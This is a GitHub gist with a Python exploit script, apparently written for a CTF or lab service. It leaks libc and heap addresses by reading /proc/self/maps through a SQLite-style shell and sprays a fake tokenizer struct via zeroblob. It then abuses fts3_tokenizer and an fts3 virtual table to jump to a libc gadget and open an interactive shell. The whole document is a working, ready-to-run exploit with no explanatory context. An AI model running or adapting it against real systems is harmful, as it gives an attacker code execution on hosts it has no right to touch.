Skip to content

Instantly share code, notes, and snippets.

@bongtrop
Created September 22, 2022 11:57
Show Gist options
  • Save bongtrop/b75071bd82b78869470caa17d30e40e2 to your computer and use it in GitHub Desktop.
Save bongtrop/b75071bd82b78869470caa17d30e40e2 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
import sys
# https://github.com/hellman/sock
from sock import Sock
import os
import sys
import struct
# In Apple M1, it is very hard to install pwntools, so just don't use it
# from pwn import *
print("Start Exploit !")
if len(sys.argv) == 2:
host = sys.argv[1]
else:
print("Local Test")
host = os.getenv('MY_IP') or '10.60.3.3'
print("Target: {}".format(host))
def execute(sql, last=False):
global s
s.sendline(sql)
return s.readuntil("> ")[:-2]
s = Sock(host, 1433)
s.readuntil(">")
map_raw = execute(".read /proc/self/maps")
maps = map_raw.splitlines()
libc_addr = int(maps[23][:12], 16)
heap_addr = int(maps[6][:12], 16)
spawn_shell_addr = libc_addr + 0xc96da
# spawn_shell_addr = 0xdeadbeef
shell_struct = struct.pack("<Q", 0)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
execute(f"select replace(hex(zeroblob(31337)), '00', x'414E5941414E5941{shell_struct.hex()}414E5941414E5941');")
# Calc from GDB
heap_offset = 0x1221b0
shell_struct_addr = heap_addr + heap_offset
print("Struct Addr:", hex(shell_struct_addr))
shell_struct_addr_hex = struct.pack("<Q", shell_struct_addr).hex()
execute(f"select hex(fts3_tokenizer('shell', x'{shell_struct_addr_hex}'));")
# s.interactive()
s.sendline('create virtual table shell using fts3(tokenize=shell);')
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment